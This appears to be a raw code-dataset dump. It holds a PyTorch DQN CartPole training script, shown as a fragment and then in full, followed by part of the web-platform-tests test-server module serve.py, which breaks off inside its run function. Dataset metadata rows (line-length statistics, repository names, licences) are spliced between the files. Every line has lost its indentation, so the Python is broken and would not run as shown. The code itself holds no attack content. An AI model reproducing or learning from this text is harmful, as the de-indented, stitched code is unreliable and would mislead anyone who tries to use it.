non_final_mask = torch.tensor(
tuple(map(lambda s: s is not None, batch.next_state)), device=device, dtype=torch.bool
)
non_final_next_states = torch.cat([s for s in batch.next_state if s is not None])
state_batch = torch.cat(batch.state)
action_batch = torch.cat(batch.action)
reward_batch = torch.cat(batch.reward)
state_action_values = policy_net(state_batch).gather(1, action_batch)
next_state_values = torch.zeros(BATCH_SIZE, device=device)
next_state_values[non_final_mask] = target_net(non_final_next_states).max(1)[0].detach()
expected_state_action_values = (next_state_values * GAMMA) + reward_batch
criterion = nn.SmoothL1Loss()
loss = criterion(state_action_values, expected_state_action_values.unsqueeze(1))
optimizer.zero_grad()
loss.backward()
for param in policy_net.parameters():
param.grad.data.clamp_(-1, 1)
optimizer.step()
num_episodes = 50
for i_episode in range(num_episodes):
env.reset()
last_screen = get_screen()
current_screen = get_screen()
state = current_screen - last_screen
for t in count():
action = select_action(state)
_, reward, done, _ = env.step(action.item())
reward = torch.tensor([reward], device=device)
last_screen = current_screen
current_screen = get_screen()
if not done:
next_state = current_screen - last_screen
else:
next_state = None
memory.push(state, action, next_state, reward)
state = next_state
optimize_model()
if done:
episode_durations.append(t + 1)
plot_durations()
break
if i_episode % TARGET_UPDATE == 0:
target_net.load_state_dict(policy_net.state_dict())
print("Complete")
env.render()
env.close()
plt.ioff()
plt.show()
| 29.217391
| 94
| 0.67381
|
import gym
import math
import random
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from collections import namedtuple, deque
from itertools import count
from PIL import Image
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torchvision.transforms as T
env = gym.make("CartPole-v0").unwrapped
is_ipython = "inline" in matplotlib.get_backend()
if is_ipython:
from IPython import display
plt.ion()
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
Transition = namedtuple("Transition", ("state", "action", "next_state", "reward"))
class ReplayMemory(object):
def __init__(self, capacity):
self.memory = deque([], maxlen=capacity)
def push(self, *args):
self.memory.append(Transition(*args))
def sample(self, batch_size):
return random.sample(self.memory, batch_size)
def __len__(self):
return len(self.memory)
class DQN(nn.Module):
def __init__(self, h, w, outputs):
super(DQN, self).__init__()
self.conv1 = nn.Conv2d(3, 16, kernel_size=5, stride=2)
self.bn1 = nn.BatchNorm2d(16)
self.conv2 = nn.Conv2d(16, 32, kernel_size=5, stride=2)
self.bn2 = nn.BatchNorm2d(32)
self.conv3 = nn.Conv2d(32, 32, kernel_size=5, stride=2)
self.bn3 = nn.BatchNorm2d(32)
def conv2d_size_out(size, kernel_size=5, stride=2):
return (size - (kernel_size - 1) - 1) // stride + 1
convw = conv2d_size_out(conv2d_size_out(conv2d_size_out(w)))
convh = conv2d_size_out(conv2d_size_out(conv2d_size_out(h)))
linear_input_size = convw * convh * 32
self.head = nn.Linear(linear_input_size, outputs)
def forward(self, x):
x = x.to(device)
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
x = F.relu(self.bn3(self.conv3(x)))
return self.head(x.view(x.size(0), -1))
resize = T.Compose([T.ToPILImage(), T.Resize(40, interpolation=Image.CUBIC), T.ToTensor()])
def get_cart_location(screen_width):
world_width = env.x_threshold * 2
scale = screen_width / world_width
return int(env.state[0] * scale + screen_width / 2.0)
def get_screen():
screen = env.render(mode="rgb_array").transpose((2, 0, 1))
_, screen_height, screen_width = screen.shape
screen = screen[:, int(screen_height * 0.4) : int(screen_height * 0.8)]
view_width = int(screen_width * 0.6)
cart_location = get_cart_location(screen_width)
if cart_location < view_width // 2:
slice_range = slice(view_width)
elif cart_location > (screen_width - view_width // 2):
slice_range = slice(-view_width, None)
else:
slice_range = slice(cart_location - view_width // 2, cart_location + view_width // 2)
screen = screen[:, :, slice_range]
screen = np.ascontiguousarray(screen, dtype=np.float32) / 255
screen = torch.from_numpy(screen)
return resize(screen).unsqueeze(0)
env.reset()
plt.figure()
plt.imshow(get_screen().cpu().squeeze(0).permute(1, 2, 0).numpy(), interpolation="none")
plt.title("Example extracted screen")
plt.show()
BATCH_SIZE = 128
GAMMA = 0.999
EPS_START = 0.9
EPS_END = 0.05
EPS_DECAY = 200
TARGET_UPDATE = 10
init_screen = get_screen()
_, _, screen_height, screen_width = init_screen.shape
n_actions = env.action_space.n
policy_net = DQN(screen_height, screen_width, n_actions).to(device)
target_net = DQN(screen_height, screen_width, n_actions).to(device)
target_net.load_state_dict(policy_net.state_dict())
target_net.eval()
optimizer = optim.RMSprop(policy_net.parameters())
memory = ReplayMemory(10000)
steps_done = 0
def select_action(state):
global steps_done
sample = random.random()
eps_threshold = EPS_END + (EPS_START - EPS_END) * math.exp(-1.0 * steps_done / EPS_DECAY)
steps_done += 1
if sample > eps_threshold:
with torch.no_grad():
return policy_net(state).max(1)[1].view(1, 1)
else:
return torch.tensor([[random.randrange(n_actions)]], device=device, dtype=torch.long)
episode_durations = []
def plot_durations():
plt.figure(2)
plt.clf()
durations_t = torch.tensor(episode_durations, dtype=torch.float)
plt.title("Training...")
plt.xlabel("Episode")
plt.ylabel("Duration")
plt.plot(durations_t.numpy())
if len(durations_t) >= 100:
means = durations_t.unfold(0, 100, 1).mean(1).view(-1)
means = torch.cat((torch.zeros(99), means))
plt.plot(means.numpy())
plt.pause(0.001)
if is_ipython:
display.clear_output(wait=True)
display.display(plt.gcf())
def optimize_model():
if len(memory) < BATCH_SIZE:
return
transitions = memory.sample(BATCH_SIZE)
batch = Transition(*zip(*transitions))
non_final_mask = torch.tensor(
tuple(map(lambda s: s is not None, batch.next_state)), device=device, dtype=torch.bool
)
non_final_next_states = torch.cat([s for s in batch.next_state if s is not None])
state_batch = torch.cat(batch.state)
action_batch = torch.cat(batch.action)
reward_batch = torch.cat(batch.reward)
state_action_values = policy_net(state_batch).gather(1, action_batch)
next_state_values = torch.zeros(BATCH_SIZE, device=device)
next_state_values[non_final_mask] = target_net(non_final_next_states).max(1)[0].detach()
expected_state_action_values = (next_state_values * GAMMA) + reward_batch
criterion = nn.SmoothL1Loss()
loss = criterion(state_action_values, expected_state_action_values.unsqueeze(1))
optimizer.zero_grad()
loss.backward()
for param in policy_net.parameters():
param.grad.data.clamp_(-1, 1)
optimizer.step()
num_episodes = 50
for i_episode in range(num_episodes):
env.reset()
last_screen = get_screen()
current_screen = get_screen()
state = current_screen - last_screen
for t in count():
action = select_action(state)
_, reward, done, _ = env.step(action.item())
reward = torch.tensor([reward], device=device)
last_screen = current_screen
current_screen = get_screen()
if not done:
next_state = current_screen - last_screen
else:
next_state = None
memory.push(state, action, next_state, reward)
state = next_state
optimize_model()
if done:
episode_durations.append(t + 1)
plot_durations()
break
if i_episode % TARGET_UPDATE == 0:
target_net.load_state_dict(policy_net.state_dict())
print("Complete")
env.render()
env.close()
plt.ioff()
plt.show()
| true
| true
|
1c44615358567d6477f3746171bffef3935d9cc3
| 36,393
|
py
|
Python
|
tools/serve/serve.py
|
karlcow/wpt
|
e48be6d08b272744fe6d1d28e91a5808cf92fb68
|
[
"BSD-3-Clause"
] | null | null | null |
tools/serve/serve.py
|
karlcow/wpt
|
e48be6d08b272744fe6d1d28e91a5808cf92fb68
|
[
"BSD-3-Clause"
] | null | null | null |
tools/serve/serve.py
|
karlcow/wpt
|
e48be6d08b272744fe6d1d28e91a5808cf92fb68
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function
import abc
import argparse
import json
import logging
import os
import platform
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
from six.moves import urllib
import uuid
from collections import defaultdict, OrderedDict
from itertools import chain, product
from multiprocessing import Process, Event
from localpaths import repo_root
from six.moves import reload_module
from manifest.sourcefile import read_script_metadata, js_meta_re, parse_variants
from wptserve import server as wptserve, handlers
from wptserve import stash
from wptserve import config
from wptserve.logger import set_logger
from wptserve.handlers import filesystem_path, wrap_pipeline
from wptserve.utils import get_port, HTTPException, http2_compatible
from mod_pywebsocket import standalone as pywebsocket
EDIT_HOSTS_HELP = ("Please ensure all the necessary WPT subdomains "
"are mapped to a loopback device in /etc/hosts.\n"
"See https://web-platform-tests.org/running-tests/from-local-system.html#system-setup "
"for instructions.")
def replace_end(s, old, new):
"""
Given a string `s` that ends with `old`, replace that occurrence of `old`
with `new`.
"""
assert s.endswith(old)
return s[:-len(old)] + new
def domains_are_distinct(a, b):
a_parts = a.split(".")
b_parts = b.split(".")
min_length = min(len(a_parts), len(b_parts))
slice_index = -1 * min_length
return a_parts[slice_index:] != b_parts[slice_index:]
class WrapperHandler(object):
__meta__ = abc.ABCMeta
headers = []
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.handler = handlers.handler(self.handle_request)
def __call__(self, request, response):
self.handler(request, response)
def handle_request(self, request, response):
for header_name, header_value in self.headers:
response.headers.set(header_name, header_value)
self.check_exposure(request)
path = self._get_path(request.url_parts.path, True)
query = request.url_parts.query
if query:
query = "?" + query
meta = "\n".join(self._get_meta(request))
script = "\n".join(self._get_script(request))
response.content = self.wrapper % {"meta": meta, "script": script, "path": path, "query": query}
wrap_pipeline(path, request, response)
def _get_path(self, path, resource_path):
"""Convert the path from an incoming request into a path corresponding to an "unwrapped"
resource e.g. the file on disk that will be loaded in the wrapper.
:param path: Path from the HTTP request
:param resource_path: Boolean used to control whether to get the path for the resource that
this wrapper will load or the associated file on disk.
Typically these are the same but may differ when there are multiple
layers of wrapping e.g. for a .any.worker.html input the underlying disk file is
.any.js but the top level html file loads a resource with a
.any.worker.js extension, which itself loads the .any.js file.
If True return the path to the resource that the wrapper will load,
otherwise return the path to the underlying file on disk."""
for item in self.path_replace:
if len(item) == 2:
src, dest = item
else:
assert len(item) == 3
src = item[0]
dest = item[2 if resource_path else 1]
if path.endswith(src):
path = replace_end(path, src, dest)
return path
def _get_metadata(self, request):
"""Get an iterator over script metadata based on // META comments in the
associated js file.
:param request: The Request being processed.
"""
path = self._get_path(filesystem_path(self.base_path, request, self.url_base), False)
try:
with open(path, "rb") as f:
for key, value in read_script_metadata(f, js_meta_re):
yield key, value
except IOError:
raise HTTPException(404)
def _get_meta(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._meta_replacement(key, value)
if replacement:
yield replacement
def _get_script(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._script_replacement(key, value)
if replacement:
yield replacement
@abc.abstractproperty
def path_replace(self):
# A list containing a mix of 2 item tuples with (input suffix, output suffix)
# and 3-item tuples with (input suffix, filesystem suffix, resource suffix)
# for the case where we want a different path in the generated resource to
# the actual path on the filesystem (e.g. when there is another handler
# that will wrap the file).
return None
@abc.abstractproperty
def wrapper(self):
# String template with variables path and meta for wrapper document
return None
@abc.abstractmethod
def _meta_replacement(self, key, value):
# Get the string to insert into the wrapper document, given
# a specific metadata key: value pair.
pass
@abc.abstractmethod
def check_exposure(self, request):
# Raise an exception if this handler shouldn't be exposed after all.
pass
class HtmlWrapperHandler(WrapperHandler):
global_type = None
headers = [('Content-Type', 'text/html')]
def check_exposure(self, request):
if self.global_type:
globals = u""
for (key, value) in self._get_metadata(request):
if key == "global":
globals = value
break
if self.global_type not in parse_variants(globals):
raise HTTPException(404, "This test cannot be loaded in %s mode" %
self.global_type)
def _meta_replacement(self, key, value):
if key == "timeout":
if value == "long":
return '<meta name="timeout" content="long">'
if key == "title":
value = value.replace("&", "&").replace("<", "<")
return '<title>%s</title>' % value
return None
def _script_replacement(self, key, value):
if key == "script":
attribute = value.replace("&", "&").replace('"', """)
return '<script src="%s"></script>' % attribute
return None
class WorkersHandler(HtmlWrapperHandler):
global_type = "dedicatedworker"
path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s%(query)s"));
</script>
"""
class WindowHandler(HtmlWrapperHandler):
path_replace = [(".window.html", ".window.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyHtmlHandler(HtmlWrapperHandler):
global_type = "window"
path_replace = [(".any.html", ".any.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script>
self.GLOBAL = {
isWindow: function() { return true; },
isWorker: function() { return false; },
};
</script>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class SharedWorkersHandler(HtmlWrapperHandler):
global_type = "sharedworker"
path_replace = [(".any.sharedworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new SharedWorker("%(path)s%(query)s"));
</script>
"""
class ServiceWorkersHandler(HtmlWrapperHandler):
global_type = "serviceworker"
path_replace = [(".any.serviceworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
(async function() {
const scope = 'does/not/exist';
let reg = await navigator.serviceWorker.getRegistration(scope);
if (reg) await reg.unregister();
reg = await navigator.serviceWorker.register("%(path)s%(query)s", {scope});
fetch_tests_from_worker(reg.installing);
})();
</script>
"""
class AnyWorkerHandler(WrapperHandler):
headers = [('Content-Type', 'text/javascript')]
path_replace = [(".any.worker.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
importScripts("/resources/testharness.js");
%(script)s
importScripts("%(path)s");
done();
"""
def _meta_replacement(self, key, value):
return None
def _script_replacement(self, key, value):
if key == "script":
attribute = value.replace("\\", "\\\\").replace('"', '\\"')
return 'importScripts("%s")' % attribute
if key == "title":
value = value.replace("\\", "\\\\").replace('"', '\\"')
return 'self.META_TITLE = "%s";' % value
return None
rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")]
class RoutesBuilder(object):
def __init__(self):
self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler),
("POST", "/tools/runner/update_manifest.py",
handlers.python_script_handler)]
self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)),
("*", "/tools/*", handlers.ErrorHandler(404)),
("*", "{spec}/tools/*", handlers.ErrorHandler(404)),
("*", "/results/", handlers.ErrorHandler(404))]
self.extra = []
self.mountpoint_routes = OrderedDict()
self.add_mount_point("/", None)
def get_routes(self):
routes = self.forbidden_override + self.forbidden + self.extra
# Using reversed here means that mount points that are added later
# get higher priority. This makes sense since / is typically added
# first.
for item in reversed(self.mountpoint_routes.values()):
routes.extend(item)
return routes
def add_handler(self, method, route, handler):
self.extra.append((str(method), str(route), handler))
def add_static(self, path, format_args, content_type, route, headers=None):
if headers is None:
headers = {}
handler = handlers.StaticHandler(path, format_args, content_type, **headers)
self.add_handler("GET", str(route), handler)
def add_mount_point(self, url_base, path):
url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/"
self.mountpoint_routes[url_base] = []
routes = [
("GET", "*.worker.html", WorkersHandler),
("GET", "*.window.html", WindowHandler),
("GET", "*.any.html", AnyHtmlHandler),
("GET", "*.any.sharedworker.html", SharedWorkersHandler),
("GET", "*.any.serviceworker.html", ServiceWorkersHandler),
("GET", "*.any.worker.js", AnyWorkerHandler),
("GET", "*.asis", handlers.AsIsHandler),
("GET", "/.well-known/origin-policy", handlers.PythonScriptHandler),
("*", "*.py", handlers.PythonScriptHandler),
("GET", "*", handlers.FileHandler)
]
for (method, suffix, handler_cls) in routes:
self.mountpoint_routes[url_base].append(
(method,
"%s%s" % (url_base if url_base != "/" else "", suffix),
handler_cls(base_path=path, url_base=url_base)))
def add_file_mount_point(self, file_url, base_path):
assert file_url.startswith("/")
url_base = file_url[0:file_url.rfind("/") + 1]
self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))]
def get_route_builder(aliases, config=None):
builder = RoutesBuilder()
for alias in aliases:
url = alias["url-path"]
directory = alias["local-dir"]
if not url.startswith("/") or len(directory) == 0:
logger.error("\"url-path\" value must start with '/'.")
continue
if url.endswith("/"):
builder.add_mount_point(url, directory)
else:
builder.add_file_mount_point(url, directory)
return builder
class ServerProc(object):
def __init__(self, scheme=None):
self.proc = None
self.daemon = None
self.stop = Event()
self.scheme = scheme
def start(self, init_func, host, port, paths, routes, bind_address, config, **kwargs):
self.proc = Process(target=self.create_daemon,
args=(init_func, host, port, paths, routes, bind_address,
config),
name='%s on port %s' % (self.scheme, port),
kwargs=kwargs)
self.proc.daemon = True
self.proc.start()
def create_daemon(self, init_func, host, port, paths, routes, bind_address,
config, **kwargs):
try:
self.daemon = init_func(host, port, paths, routes, bind_address, config, **kwargs)
except socket.error:
logger.critical("Socket error on port %s" % port, file=sys.stderr)
raise
except Exception:
logger.critical(traceback.format_exc())
raise
if self.daemon:
try:
self.daemon.start(block=False)
try:
self.stop.wait()
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc(), file=sys.stderr)
raise
def wait(self):
self.stop.set()
self.proc.join()
def kill(self):
self.stop.set()
self.proc.terminate()
self.proc.join()
def is_alive(self):
return self.proc.is_alive()
def check_subdomains(config, routes):
paths = config.paths
bind_address = config.bind_address
host = config.server_host
port = get_port()
logger.debug("Going to use port %d to check subdomains" % port)
wrapper = ServerProc()
wrapper.start(start_http_server, host, port, paths, routes,
bind_address, config)
url = "http://{}:{}/".format(host, port)
connected = False
for i in range(10):
try:
urllib.request.urlopen(url)
connected = True
break
except urllib.error.URLError:
time.sleep(1)
if not connected:
logger.critical("Failed to connect to test server "
"on {}. {}".format(url, EDIT_HOSTS_HELP))
sys.exit(1)
for domain in config.domains_set:
if domain == host:
continue
try:
urllib.request.urlopen("http://%s:%d/" % (domain, port))
except Exception:
logger.critical("Failed probing domain {}. {}".format(domain, EDIT_HOSTS_HELP))
sys.exit(1)
wrapper.wait()
def make_hosts_file(config, host):
rv = []
for domain in config.domains_set:
rv.append("%s\t%s\n" % (host, domain))
# Windows interpets the IP address 0.0.0.0 as non-existent, making it an
# appropriate alias for non-existent hosts. However, UNIX-like systems
# interpret the same address to mean any IP address, which is inappropraite
# for this context. These systems do not reserve any value for this
# purpose, so the inavailability of the domains must be taken for granted.
#
# https://github.com/web-platform-tests/wpt/issues/10560
if platform.uname()[0] == "Windows":
for not_domain in config.not_domains_set:
rv.append("0.0.0.0\t%s\n" % not_domain)
return "".join(rv)
def start_servers(host, ports, paths, routes, bind_address, config, **kwargs):
servers = defaultdict(list)
for scheme, ports in ports.items():
assert len(ports) == {"http": 2, "https": 2}.get(scheme, 1)
# If trying to start HTTP/2.0 server, check compatibility
if scheme == 'h2' and not http2_compatible():
logger.error('Cannot start HTTP/2.0 server as the environment is not compatible. ' +
'Requires Python 2.7.10+ (< 3.0) and OpenSSL 1.0.2+')
continue
for port in ports:
if port is None:
continue
init_func = {"http": start_http_server,
"https": start_https_server,
"h2": start_http2_server,
"ws": start_ws_server,
"wss": start_wss_server,
"quic-transport": start_quic_transport_server}[scheme]
server_proc = ServerProc(scheme=scheme)
server_proc.start(init_func, host, port, paths, routes, bind_address,
config, **kwargs)
servers[scheme].append((port, server_proc))
return servers
def startup_failed(log=True):
# Log=False is a workaround for https://github.com/web-platform-tests/wpt/issues/22719
if log:
logger.critical(EDIT_HOSTS_HELP)
else:
print("CRITICAL %s" % EDIT_HOSTS_HELP, file=sys.stderr)
sys.exit(1)
def start_http_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=False,
key_file=None,
certificate=None,
latency=kwargs.get("latency"))
except Exception:
startup_failed()
def start_https_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"))
except Exception:
startup_failed()
def start_http2_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
handler_cls=wptserve.Http2WebTestRequestHandler,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"),
http2=True)
except Exception:
startup_failed()
class WebSocketDaemon(object):
def __init__(self, host, port, doc_root, handlers_root, bind_address, ssl_config):
self.host = host
cmd_args = ["-p", port,
"-d", doc_root,
"-w", handlers_root]
if ssl_config is not None:
cmd_args += ["--tls",
"--private-key", ssl_config["key_path"],
"--certificate", ssl_config["cert_path"]]
if (bind_address):
cmd_args = ["-H", host] + cmd_args
opts, args = pywebsocket._parse_args_and_config(cmd_args)
opts.cgi_directories = []
opts.is_executable_method = None
self.server = pywebsocket.WebSocketServer(opts)
ports = [item[0].getsockname()[1] for item in self.server._sockets]
if not ports:
# TODO: Fix the logging configuration in WebSockets processes
# see https://github.com/web-platform-tests/wpt/issues/22719
print("Failed to start websocket server on port %s, "
"is something already using that port?" % port, file=sys.stderr)
raise OSError()
assert all(item == ports[0] for item in ports)
self.port = ports[0]
self.started = False
self.server_thread = None
def start(self, block=False):
self.started = True
if block:
self.server.serve_forever()
else:
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
self.server_thread = None
except AttributeError:
pass
self.started = False
self.server = None
def release_mozlog_lock():
try:
from mozlog.structuredlog import StructuredLogger
try:
StructuredLogger._lock.release()
except threading.ThreadError:
pass
except ImportError:
pass
def start_ws_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
ssl_config=None)
except Exception:
startup_failed(log=False)
def start_wss_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
config.ssl_config)
except Exception:
startup_failed(log=False)
class QuicTransportDaemon(object):
def __init__(self, host, port, handlers_path=None, private_key=None, certificate=None, log_level=None):
args = ["python3", "wpt", "serve-quic-transport"]
if host:
args += ["--host", host]
if port:
args += ["--port", str(port)]
if private_key:
args += ["--private-key", private_key]
if certificate:
args += ["--certificate", certificate]
if handlers_path:
args += ["--handlers-path", handlers_path]
if log_level == "debug":
args += ["--verbose"]
self.command = args
self.proc = None
def start(self, block=False):
if block:
subprocess.call(self.command)
else:
def handle_signal(*_):
if self.proc:
try:
self.proc.terminate()
except OSError:
# It's fine if the child already exits.
pass
self.proc.wait()
sys.exit(0)
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
self.proc = subprocess.Popen(self.command)
# Give the server a second to start and then check.
time.sleep(1)
if self.proc.poll():
sys.exit(1)
def start_quic_transport_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return QuicTransportDaemon(host,
port,
private_key=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
log_level=config.log_level)
except Exception:
startup_failed(log=False)
def start(config, routes, **kwargs):
host = config["server_host"]
ports = config.ports
paths = config.paths
bind_address = config["bind_address"]
logger.debug("Using ports: %r" % ports)
servers = start_servers(host, ports, paths, routes, bind_address, config, **kwargs)
return servers
def iter_procs(servers):
for servers in servers.values():
for port, server in servers:
yield server.proc
def _make_subdomains_product(s, depth=2):
return {u".".join(x) for x in chain(*(product(s, repeat=i) for i in range(1, depth+1)))}
def _make_origin_policy_subdomains(limit):
return {u"op%d" % x for x in range(1,limit+1)}
_subdomains = {u"www",
u"www1",
u"www2",
u"天気の良い日",
u"élève"}
_not_subdomains = {u"nonexistent"}
_subdomains = _make_subdomains_product(_subdomains)
# Origin policy subdomains need to not be reused by any other tests, since origin policies have
# origin-wide impacts like installing a CSP or Feature Policy that could interfere with features
# under test.
# See https://github.com/web-platform-tests/rfcs/pull/44.
_subdomains |= _make_origin_policy_subdomains(99)
_not_subdomains = _make_subdomains_product(_not_subdomains)
class ConfigBuilder(config.ConfigBuilder):
"""serve config
This subclasses wptserve.config.ConfigBuilder to add serve config options.
"""
_default = {
"browser_host": "web-platform.test",
"alternate_hosts": {
"alt": "not-web-platform.test"
},
"doc_root": repo_root,
"ws_doc_root": os.path.join(repo_root, "websockets", "handlers"),
"server_host": None,
"ports": {
"http": [8000, "auto"],
"https": [8443, 8444],
"ws": ["auto"],
"wss": ["auto"],
},
"check_subdomains": True,
"log_level": "debug",
"bind_address": True,
"ssl": {
"type": "pregenerated",
"encrypt_after_connect": False,
"openssl": {
"openssl_binary": "openssl",
"base_path": "_certs",
"password": "web-platform-tests",
"force_regenerate": False,
"duration": 30,
"base_conf_path": None
},
"pregenerated": {
"host_key_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.key"),
"host_cert_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.pem")
},
"none": {}
},
"aliases": []
}
computed_properties = ["ws_doc_root"] + config.ConfigBuilder.computed_properties
def __init__(self, *args, **kwargs):
if "subdomains" not in kwargs:
kwargs["subdomains"] = _subdomains
if "not_subdomains" not in kwargs:
kwargs["not_subdomains"] = _not_subdomains
super(ConfigBuilder, self).__init__(
*args,
**kwargs
)
with self as c:
browser_host = c.get("browser_host")
alternate_host = c.get("alternate_hosts", {}).get("alt")
if not domains_are_distinct(browser_host, alternate_host):
raise ValueError(
"Alternate host must be distinct from browser host"
)
def _get_ws_doc_root(self, data):
if data["ws_doc_root"] is not None:
return data["ws_doc_root"]
else:
return os.path.join(data["doc_root"], "websockets", "handlers")
def ws_doc_root(self, v):
self._ws_doc_root = v
ws_doc_root = property(None, ws_doc_root)
def _get_paths(self, data):
rv = super(ConfigBuilder, self)._get_paths(data)
rv["ws_doc_root"] = data["ws_doc_root"]
return rv
def build_config(override_path=None, config_cls=ConfigBuilder, **kwargs):
rv = config_cls()
enable_http2 = kwargs.get("h2")
if enable_http2 is None:
enable_http2 = True
if enable_http2:
rv._default["ports"]["h2"] = [9000]
if override_path and os.path.exists(override_path):
with open(override_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
if kwargs.get("config_path"):
other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path")))
if os.path.exists(other_path):
with open(other_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
else:
raise ValueError("Config path %s does not exist" % other_path)
overriding_path_args = [("doc_root", "Document root"),
("ws_doc_root", "WebSockets document root")]
for key, title in overriding_path_args:
value = kwargs.get(key)
if value is None:
continue
value = os.path.abspath(os.path.expanduser(value))
if not os.path.exists(value):
raise ValueError("%s path %s does not exist" % (title, value))
setattr(rv, key, value)
return rv
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--latency", type=int,
help="Artificial latency to add before sending http responses, in ms")
parser.add_argument("--config", action="store", dest="config_path",
help="Path to external config file")
parser.add_argument("--doc_root", action="store", dest="doc_root",
help="Path to document root. Overrides config.")
parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root",
help="Path to WebSockets document root. Overrides config.")
parser.add_argument("--alias_file", action="store", dest="alias_file",
help="File with entries for aliases/multiple doc roots. In form of `/ALIAS_NAME/, DOC_ROOT\\n`")
parser.add_argument("--h2", action="store_true", dest="h2", default=None,
help=argparse.SUPPRESS)
parser.add_argument("--no-h2", action="store_false", dest="h2", default=None,
help="Disable the HTTP/2.0 server")
parser.add_argument("--quic-transport", action="store_true", help="Enable QUIC server for WebTransport")
parser.add_argument("--exit-after-start", action="store_true", help="Exit after starting servers")
parser.set_defaults(report=False)
parser.set_defaults(is_wave=False)
return parser
def run(config_cls=ConfigBuilder, route_builder=None, **kwargs):
received_signal = threading.Event()
with build_config(os.path.join(repo_root, "config.json"),
config_cls=config_cls,
**kwargs) as config:
global logger
logger = config.logger
set_logger(logger)
# Configure the root logger to cover third-party libraries.
logging.getLogger().setLevel(config.log_level)
def handle_signal(signum, frame):
logger.debug("Received signal %s. Shutting down.", signum)
received_signal.set()
bind_address = config["bind_address"]
if kwargs.get("alias_file"):
with open(kwargs["alias_file"], 'r') as alias_file:
for line in alias_file:
alias, doc_root = [x.strip() for x in line.split(',')]
config["aliases"].append({
'url-path': alias,
'local-dir': doc_root,
})
if route_builder is None:
route_builder = get_route_builder
routes = route_builder(config.aliases, config).get_routes()
if config["check_subdomains"]:
check_subdomains(config, routes)
stash_address = None
if bind_address:
stash_address = (config.server_host, get_port(""))
logger.debug("Going to use port %d for stash" % stash_address[1])
